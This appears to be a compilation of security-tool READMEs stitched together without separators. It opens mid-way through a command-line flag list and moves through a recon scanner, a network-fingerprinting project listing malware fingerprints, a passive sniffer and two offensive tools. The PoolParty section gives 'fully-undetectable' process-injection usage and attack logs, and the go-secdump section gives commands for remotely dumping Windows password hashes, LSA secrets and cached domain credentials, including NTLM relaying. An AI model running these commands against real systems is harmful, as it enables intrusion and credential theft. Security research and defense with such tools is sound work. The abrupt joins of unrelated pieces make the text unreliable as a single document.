[--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
[--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
[--report-all-detectors] [--report-all-severity] [--report-all-impact]
[--report-all-confidence] [--report-all-categories] [--report-all-filters]
[--report-all-options] [--report-all] [--report-none] [--ai-enabled] [--ai-disabled]
[--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
[--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
[--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
[--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
[--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
[--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
[--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
[--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
[--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
[--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
[--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
[--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
[--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
[--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
[--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
[--ai-models-config-version-minor AI_MODELS_CONFIG_VERSION_MINOR]
[--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
[--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
[--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
[--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
[--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
[--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
[--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
[--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
[--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
[--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
[--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
[--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
[--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
[--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
[--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
[--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
[--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
[--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
[--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
[--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
[--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
[--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
[--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
[--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
[--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]
This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:
- Vulnerability detection: --detect, --exclude-detectors
- Reporting: --report-format, --report-output, --report-*
- Filtering: --filter-*
- AI-powered features: --ai-*
- Truffle integration: --truffle, --truffle-build-directory
- Compilation and detector listing: --compile, --list-detectors, --list-detectors-info
By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.
Num | Detector | What it Detects | Impact | Confidence |
---|---|---|---|---|
1 | ai-anomaly-detection | Detect anomalous code patterns using advanced AI models | High | High |
2 | ai-vulnerability-prediction | Predict potential vulnerabilities using machine learning | High | High |
3 | ai-code-optimization | Suggest code optimizations based on AI-driven analysis | Medium | High |
4 | ai-contract-complexity | Assess contract complexity and maintainability using AI | Medium | High |
5 | ai-gas-optimization | Identify gas-optimizing opportunities with AI | Medium | Medium |
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
Current features (v1.0.1):
- Subdomain enumeration (2 engines + bruteforcing)
- User-friendly output
- Resolving A records (IPv4)
A few features are work in progress. See Planned features for more details.
The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.
You can build this repo from source. Clone the repository and build with nimble:
git clone git@github.com:pptx704/domainim
nimble build
./domainim <domain> [--ports=<ports>]
Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.
./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
- <domain> is the domain to be enumerated. It can be a subdomain as well.
- --ports | -p is a string specification of the ports to be scanned. It can be one of the following:
  - all - Scan all ports (1-65535)
  - none - Skip port scanning (default)
  - t<n> - Scan top n ports (same as nmap), i.e. t100 scans the top 100 ports. Max value is 5000; if n is greater than 5000, it will be set to 5000.
  - 80 scans port 80
  - 80-100 scans ports 80 to 100
  - 80,443,8080 scans ports 80, 443 and 8080
  - 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and the top 500 ports
- --dns | -d is the address of the DNS server. This should be a valid IPv4 address and can optionally contain the port number:
  - a.b.c.d - Use DNS server at a.b.c.d on port 53
  - a.b.c.d#n - Use DNS server at a.b.c.d on port n
- --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
- --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. Note that DNS queries are made in batches and the next batch is made only after the previous one is completed. Since queries can be rate limited, increasing the value does not always guarantee faster results.
- --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.

Examples:
- ./domainim nmap.org --ports=all
- ./domainim google.com --ports=none --dns=8.8.8.8#53
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
- ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --out=results.json
- ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1
The help menu can be accessed using ./domainim --help or ./domainim -h.
Usage:
domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
domainim (-h | --help)
Options:
-h, --help Show this screen.
-p, --ports Ports to scan. [default: `none`]
Can be `all`, `none`, `t<n>`, single value, range value, combination
-l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
-d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
-r, --rps DNS queries to be made per second [default: 1024 req/s]
-o, --out JSON file where the output will be saved. Filename must end with `.json`
Examples:
domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
domainim sub.domainim.com --ports=all --dns:8.8.8.8 -t:1500 -o:results.json
The JSON schema for the results is as follows:

[
    {
        "subdomain": string,
        "data": [
            {
                "ipv4": string,
                "vhosts": [string],
                "reverse_dns": string,
                "ports": [int]
            }
        ]
    }
]
Example json for nmap.org can be found here.
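As a quick illustration of consuming this schema, here is a small Python sketch that loads a file saved with --out and prints hosts with open ports (the filename is an example):

```python
# Hedged sketch: read domainim results saved with --out and print every
# subdomain/IP pair that has at least one open port. Field names follow
# the documented schema; "results.json" is an example filename.
import json

with open("results.json") as f:
    results = json.load(f)

for entry in results:
    for rec in entry["data"]:
        if rec["ports"]:
            print(entry["subdomain"], rec["ipv4"], rec["ports"])
```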
Contributions are welcome. Feel free to open a pull request or an issue.
This project is still in its early stages. There are several limitations I am aware of.
The two engines I am using (I'm calling them engines because Sublist3r does so) currently have some sort of response limit. dnsdumpster can fetch up to 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is that it sometimes returns an SQL error, so for some domains the results can differ between runs. I am planning to add more engines in the future (at least a brute-force engine).
The port scanner only has a ping response time + 750ms timeout. This might lead to false negatives. Since domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).
It might seem that the way vhostnames are printed just brings repetition to the table.
Printing them as follows might have been better:
ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
↳ 45.33.49.119
↳ Reverse DNS: ack.nmap.org.
But previously while testing, I found cases where not all IPs are shared by the same set of vhostnames. That is why I decided to keep it this way.
DNS servers might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This way the DNS server doesn't get all the queries at once, but rather in a more natural way. For the bruteforcing method, the value is between 0-1000ms by default, but that can be changed using the --rps | -r flag.
One particular limitation that is bugging me is that the DNS resolver does not return all the IPs for a domain, so it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs there are for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records, so if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author about this.
For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this also skips valid subdomains (i.e. scanme.nmap.org will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.
A similar thing is true for vhost enumeration for subdomain inputs. Since URLs that end with the given subdomain are returned, subdomains of similar domains are not considered. For example, scannme.nmap.org will not be printed for ack.nmap.org, but something.ack.nmap.org might be. I could search for all subdomains of nmap.org, but that defeats the purpose of having a subdomain as an input.
MIT License. See LICENSE for full text.
JA4+ is a suite of network fingerprinting methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.
Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
JA4T: TCP Fingerprinting (JA4T/TS/TScan)
To understand how to read JA4+ fingerprints, see Technical Details
This repo includes JA4+ Python, Rust, Zeek and C, as a Wireshark plugin.
JA4/JA4+ support is being added to:
GreyNoise
Hunt
Driftnet
DarkSail
Arkime
GoLang (JA4X)
Suricata
Wireshark
Zeek
nzyme
Netresec's CapLoader
Netresec's NetworkMiner
NGINX
F5 BIG-IP
nfdump
ntop's ntopng
ntop's nDPI
Team Cymru
NetQuest
Censys
Exploit.org's Netryx
Cloudflare
fastly
with more to be announced...
Application | JA4+ Fingerprints |
---|---|
Chrome | JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP), JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC), JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key), JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key) |
IcedID Malware Dropper | JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982 |
IcedID Malware | JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8, JA4S=t120300_c030_5e2616a54c73 |
Sliver Malware | JA4=t13d190900_9dc949149365_97f8aa674fd9, JA4S=t130200_1301_a56c5b993250, JA4X=000000000000_4f24da86fad6_bf0f0589fc03, JA4X=000000000000_7c32fa18c13e_bf0f0589fc03 |
Cobalt Strike | JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd, JA4X=2166164053c1_2166164053c1_30d204a01551 |
SoftEther VPN | JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client), JA4S=t130200_1302_a56c5b993250, JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae |
Qakbot | JA4X=2bab15409345_af684594efb4_000000000000 |
Pikabot | JA4X=1a59268f55e5_1a59268f55e5_795797892f9c |
Darkgate | JA4H=po10nn060000_cdb958d032b0 |
LummaC2 | JA4H=po11nn050000_d253db9d024b |
Evilginx | JA4=t13d191000_9dc949149365_e7c285222651 |
Reverse SSH Shell | JA4SSH=c76s76_c71s59_c0s70 |
Windows 10 | JA4T=64240_2-1-3-1-1-4_1460_8 |
Epson Printer | JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16 |
For more, see ja4plus-mapping.csv
The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.
Recommended to have tshark version 4.0.6 or later for full functionality. See: https://pkgs.org/search/?q=tshark
Download the latest JA4 binaries from: Releases.
sudo apt install tshark
./ja4 [options] [pcap]
1) Install Wireshark https://www.wireshark.org/download.html which will install tshark
2) Add tshark to $PATH
ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
./ja4 [options] [pcap]
1) Install Wireshark for Windows from https://www.wireshark.org/download.html, which will install tshark.exe
tshark.exe is at the location where Wireshark is installed, for example: C:\Program Files\Wireshark\tshark.exe
2) Add the location of tshark to your "PATH" environment variable in Windows.
(System properties > Environment Variables... > Edit Path)
3) Open cmd and navigate to the ja4 folder
ja4 [options] [pcap]
An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.
In the meantime, see ja4plus-mapping.csv
Feel free to do a pull request with any JA4+ data you find.
JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.
All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.
For example, GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints, but with JA4, only the b part of the JA4 fingerprint changes; parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).
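Since every JA4+ fingerprint is three underscore-delimited sections, slicing out the a/c pair is trivial. A minimal sketch (the function name is illustrative):

```python
# Hedged sketch: split a JA4 fingerprint into its a/b/c sections and
# form the JA4_ac variant used in the GreyNoise example above.
def ja4_parts(fp: str):
    a, b, c = fp.split("_")
    return {"a": a, "b": b, "c": c, "ac": f"{a}_{c}"}

print(ja4_parts("t13d1516h2_8daaf6152771_02713d6af862")["ac"])
# -> t13d1516h2_02713d6af862
```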
Current methods and implementation details:
Full Name | Short Name | Description |
---|---|---|
JA4 | JA4 | TLS Client Fingerprinting |
JA4Server | JA4S | TLS Server Response / Session Fingerprinting |
JA4HTTP | JA4H | HTTP Client Fingerprinting |
JA4Latency | JA4L | Latency Measurement / Light Distance |
JA4X509 | JA4X | X509 TLS Certificate Fingerprinting |
JA4SSH | JA4SSH | SSH Traffic Fingerprinting |
JA4TCP | JA4T | TCP Client Fingerprinting |
JA4TCPServer | JA4TS | TCP Server Response Fingerprinting |
JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner |
The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...
To understand how to read JA4+ fingerprints, see Technical Details
JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.
JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.
All JA4+ methods are patent pending.
JA4+ is a trademark of FoxIO
JA4+ can and is being implemented into open source tools, see the License FAQ for details.
This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.
ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.
Q: Why are you sorting the ciphers? Doesn't the ordering matter?
A: It does but in our research we've found that applications and libraries choose a unique cipher list more than unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.
Q: Why are you sorting the extensions?
A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.
So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.
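As a toy illustration of why sorting defeats randomized ordering: the hash is taken over the sorted values, so the arrival order cannot change the result. This is simplified; JA4 uses a truncated SHA-256 over sorted, comma-joined values, and the extension values here are made up:

```python
# Toy illustration: hashing a sorted list makes the fingerprint part
# independent of the order the values arrived in. Simplified relative
# to the real JA4 spec; example values are arbitrary.
import hashlib

def part_hash(values):
    return hashlib.sha256(",".join(sorted(values)).encode()).hexdigest()[:12]

# Two differently-ordered extension lists produce the same hash part.
assert part_hash(["000a", "0017", "ff01"]) == part_hash(["ff01", "000a", "0017"])
print(part_hash(["000a", "0017", "ff01"]))
```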
Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions, and even though TLS 1.3 only supports a few ciphers, browsers and applications still support many more.
John Althouse, with feedback from:
Josh Atkins
Jeff Atkinson
Joshua Alexander
W.
Joe Martin
Ben Higgins
Andrew Morris
Chris Ueland
Ben Schofield
Matthias Vallentin
Valeriy Vorotyntsev
Timothy Noel
Gary Lipsky
And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.
Contact John Althouse at john@foxio.io for licensing and questions.
Copyright (c) 2024, FoxIO
A collection of fully-undetectable process injection techniques abusing Windows Thread Pools. Presented at Black Hat EU 2023 Briefings under the title The Pool Party You Will Never Forget: New Process Injection Techniques Using Windows Thread Pools.
Variant ID | Variant Description |
---|---|
1 | Overwrite the start routine of the target worker factory |
2 | Insert TP_WORK work item to the target process's thread pool |
3 | Insert TP_WAIT work item to the target process's thread pool |
4 | Insert TP_IO work item to the target process's thread pool |
5 | Insert TP_ALPC work item to the target process's thread pool |
6 | Insert TP_JOB work item to the target process's thread pool |
7 | Insert TP_DIRECT work item to the target process's thread pool |
8 | Insert TP_TIMER work item to the target process's thread pool |
PoolParty.exe -V <VARIANT ID> -P <TARGET PID>
Insert TP_TIMER work item to process ID 1234
>> PoolParty.exe -V 8 -P 1234
[info] Starting PoolParty attack against process id: 1234
[info] Retrieved handle to the target process: 00000000000000B8
[info] Hijacked worker factory handle from the target process: 0000000000000058
[info] Hijacked timer queue handle from the target process: 0000000000000054
[info] Allocated shellcode memory in the target process: 00000281DBEF0000
[info] Written shellcode to the target process
[info] Retrieved target worker factory basic information
[info] Created TP_TIMER structure associated with the shellcode
[info] Allocated TP_TIMER memory in the target process: 00000281DBF00000
[info] Written the specially crafted TP_TIMER structure to the target process
[info] Modified the target process's TP_POOL timer queue list entry to point to the specially crafted TP_TIMER
[info] Set the timer queue to expire to trigger the dequeueing TppTimerQueueExpiration
[info] PoolParty attack completed successfully
The default shellcode spawns a calculator via the WinExec API. To customize the executable to execute, change the path at the end of the g_Shellcode variable present in the main.cpp file.
Package go-secdump is a tool built to remotely extract hashes from the SAM registry hive as well as LSA secrets and cached hashes from the SECURITY hive without any remote agent and without touching disk.
The tool is built on top of the library go-smb and uses it to communicate with the Windows Remote Registry to retrieve registry keys directly from memory.
It was built as a learning experience and as a proof of concept that it should be possible to remotely retrieve the NT Hashes from the SAM hive and the LSA secrets as well as domain cached credentials without having to first save the registry hives to disk and then parse them locally.
The main problem to overcome was that the SAM and SECURITY hives are only readable by NT AUTHORITY\SYSTEM. However, I noticed that the local Administrators group has the WriteDACL permission on the registry hives and can thus be used to temporarily grant read access to itself, retrieve the secrets, and then restore the original permissions.
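For illustration, the grant-read-then-restore idea can be sketched locally with pywin32 (go-secdump itself is written in Go and performs these steps remotely over the Windows Remote Registry protocol; treat this as a conceptual sketch under those assumptions, not the tool's code):

```python
import winreg
import win32api
import win32security

KEY = r"MACHINE\SAM"  # SE_REGISTRY_KEY path notation for HKLM\SAM

def read_dacl():
    sd = win32security.GetNamedSecurityInfo(
        KEY, win32security.SE_REGISTRY_KEY,
        win32security.DACL_SECURITY_INFORMATION)
    return sd.GetSecurityDescriptorDacl()

original = read_dacl()  # keep an untouched copy to restore later

# Grant ourselves KEY_READ by appending an access-allowed ACE
me = win32security.LookupAccountName(None, win32api.GetUserName())[0]
patched = read_dacl()
patched.AddAccessAllowedAce(win32security.ACL_REVISION, winreg.KEY_READ, me)
win32security.SetNamedSecurityInfo(
    KEY, win32security.SE_REGISTRY_KEY,
    win32security.DACL_SECURITY_INFORMATION, None, None, patched, None)

# ... read the protected keys here ...

# Restore the original DACL so no modification is left behind
win32security.SetNamedSecurityInfo(
    KEY, win32security.SE_REGISTRY_KEY,
    win32security.DACL_SECURITY_INFORMATION, None, None, original, None)
```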
Much of the code in this project is inspired/taken from Impacket's secdump but converted to access the Windows registry remotely and to only access the required registry keys.
Some of the other sources that have been useful to understanding the registry structure and encryption methods are listed below:
https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
http://www.beginningtoseethelight.org/ntsecurity/index.htm
https://social.technet.microsoft.com/Forums/en-US/6e3c4486-f3a1-4d4e-9f5c-bdacdb245cfd/how-are-ntlm-hashes-stored-under-the-v-key-in-the-sam?forum=win10itprogeneral
Usage: ./go-secdump [options]
options:
--host <target> Hostname or ip address of remote server
-P, --port <port> SMB Port (default 445)
-d, --domain <domain> Domain name to use for login
-u, --user <username> Username
-p, --pass <pass> Password
-n, --no-pass Disable password prompt and send no credentials
--hash <NT Hash> Hex encoded NT Hash for user password
--local Authenticate as a local user instead of domain user
--dump Saves the SAM and SECURITY hives to disk and
transfers them to the local machine.
--sam Extract secrets from the SAM hive explicitly. Only other explicit targets are included.
--lsa Extract LSA secrets explicitly. Only other explicit targets are included.
--dcc2 Extract DCC2 caches explicitly. Only other explicit targets are included.
--backup-dacl Save original DACLs to disk before modification
--restore-dacl Restore DACLs using disk backup. Could be useful if automated restore fails.
--backup-file Filename for DACL backup (default dacl.backup)
--relay Start an SMB listener that will relay incoming
NTLM authentications to the remote server and
use that connection. NOTE that this forces SMB 2.1
without encryption.
--relay-port <port> Listening port for relay (default 445)
--socks-host <target> Establish connection via a SOCKS5 proxy server
--socks-port <port> SOCKS5 proxy port (default 1080)
-t, --timeout Dial timeout in seconds (default 5)
--noenc Disable smb encryption
--smb2 Force smb 2.1
--debug Enable debug logging
--verbose Enable verbose logging
-o, --output Filename for writing results (default is stdout). Will append to file if it exists.
-v, --version Show version
go-secdump will automatically try to modify and then restore the DACLs of the required registry keys. However, if something goes wrong during the restoration part such as a network disconnect or other interrupt, the remote registry will be left with the modified DACLs.
Using the --backup-dacl
argument it is possible to store a serialized copy of the original DACLs before modification. If a connectivity problem occurs, the DACLs can later be restored from file using the --restore-dacl
argument.
Dump all registry secrets
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local
or
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam --lsa --dcc2
Dump only SAM, LSA, or DCC2 cache secrets
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --sam
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --lsa
./go-secdump --host DESKTOP-AIG0C1D2 --user Administrator --pass adminPass123 --local --dcc2
Dump registry secrets using NTLM relaying
Start listener
./go-secdump --host 192.168.0.100 -n --relay
Trigger an authentication to your machine from a client with administrative access to 192.168.0.100, then wait for the dumped secrets.
YYYY/MM/DD HH:MM:SS smb [Notice] Client connected from 192.168.0.30:49805
YYYY/MM/DD HH:MM:SS smb [Notice] Client (192.168.0.30:49805) successfully authenticated as (domain.local\Administrator) against (192.168.0.100:445)!
Net-NTLMv2 Hash: Administrator::domain.local:34f4533b697afc39:b4dcafebabedd12deadbeeffef1cea36:010100000deadbeef59d13adc22dda0
2023/12/13 14:47:28 [Notice] [+] Signing is NOT required
2023/12/13 14:47:28 [Notice] [+] Login successful as domain.local\Administrator
[*] Dumping local SAM hashes
Name: Administrator
RID: 500
NT: 2727D7906A776A77B34D0430EAACD2C5
Name: Guest
RID: 501
NT: <empty>
Name: DefaultAccount
RID: 503
NT: <empty>
Name: WDAGUtilityAccount
RID: 504
NT: <empty>
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC: 0x15deadbeef645e75b38a50a52bdb67b4
$MACHINE.ACC:plain_password_hex:47331e26f48208a7807cafeababe267261f79fdc 38c740b3bdeadbeef7277d696bcafebabea62bb5247ac63be764401adeadbeef4563cafebabe43692deadbeef03f...
[*] DPAPI_SYSTEM
dpapi_machinekey: 0x8afa12897d53deadbeefbd82593f6df04de9c100
dpapi_userkey: 0x706e1cdea9a8a58cafebabe4a34e23bc5efa8939
[*] NL$KM
NL$KM: 0x53aa4b3d0deadbeef42f01ef138c6a74
[*] Dumping cached domain credentials (domain/username:hash)
DOMAIN.LOCAL/Administrator:$DCC2$10240#Administrator#97070d085deadbeef22cafebabedd1ab
...
Dump secrets using an upstream SOCKS5 proxy either for pivoting or to take advantage of Impacket's ntlmrelayx.py SOCKS server functionality.
When using ntlmrelayx.py as the upstream proxy, the provided username must match that of the authenticated client, but the password can be empty.
./ntlmrelayx.py -socks -t 192.168.0.100 -smb2support --no-http-server --no-wcf-server --no-raw-server
...
./go-secdump --host 192.168.0.100 --user Administrator -n --socks-host 127.0.0.1 --socks-port 1080
Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.
Author: Magama Bazarov, <caster@exploit.org>
Pseudonym: Caster
Version: 2.6
Codename: Introvert
All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.
It is a specialized network security tool that helps both pentesters and security professionals.
Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on network traffic analysis, so it makes no noise on the air, and it is built completely on the Scapy library.
Above allows pentesters to automate the process of finding vulnerabilities in network hardware. Discovery protocols, dynamic routing, 802.1Q, ICS Protocols, FHRP, STP, LLMNR/NBT-NS, etc.
Detects up to 27 protocols:
MACSec (802.1X AE)
EAPOL (Checking 802.1X versions)
ARP (Passive ARP, Host Discovery)
CDP (Cisco Discovery Protocol)
DTP (Dynamic Trunking Protocol)
LLDP (Link Layer Discovery Protocol)
802.1Q Tags (VLAN)
S7COMM (Siemens)
OMRON
TACACS+ (Terminal Access Controller Access Control System Plus)
ModbusTCP
STP (Spanning Tree Protocol)
OSPF (Open Shortest Path First)
EIGRP (Enhanced Interior Gateway Routing Protocol)
BGP (Border Gateway Protocol)
VRRP (Virtual Router Redundancy Protocol)
HSRP (Hot Standby Router Protocol)
GLBP (Gateway Load Balancing Protocol)
IGMP (Internet Group Management Protocol)
LLMNR (Link Local Multicast Name Resolution)
NBT-NS (NetBIOS Name Service)
MDNS (Multicast DNS)
DHCP (Dynamic Host Configuration Protocol)
DHCPv6 (Dynamic Host Configuration Protocol v6)
ICMPv6 (Internet Control Message Protocol v6)
SSDP (Simple Service Discovery Protocol)
MNDP (MikroTik Neighbor Discovery Protocol)
Above works in two modes:
- Hot mode: listening to traffic live on a network interface; the captured traffic can also be recorded to a .pcap file whose name you specify yourself
- Cold mode: taking a recorded .pcap file as input and looking for protocols in it
The tool is very simple in its operation and is driven by arguments:
file, its name you specify yourselfusage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]
options:
-h, --help show this help message and exit
--interface INTERFACE
Interface for traffic listening
--timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
--output OUTPUT File name where the traffic will be recorded
--input INPUT File name of the traffic dump
--passive-arp Passive ARP (Host Discovery)
The information obtained will be useful not only to the pentester but also to the security engineer, who will know what to pay attention to.
When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:
Impact: What kind of attack can be performed on this protocol;
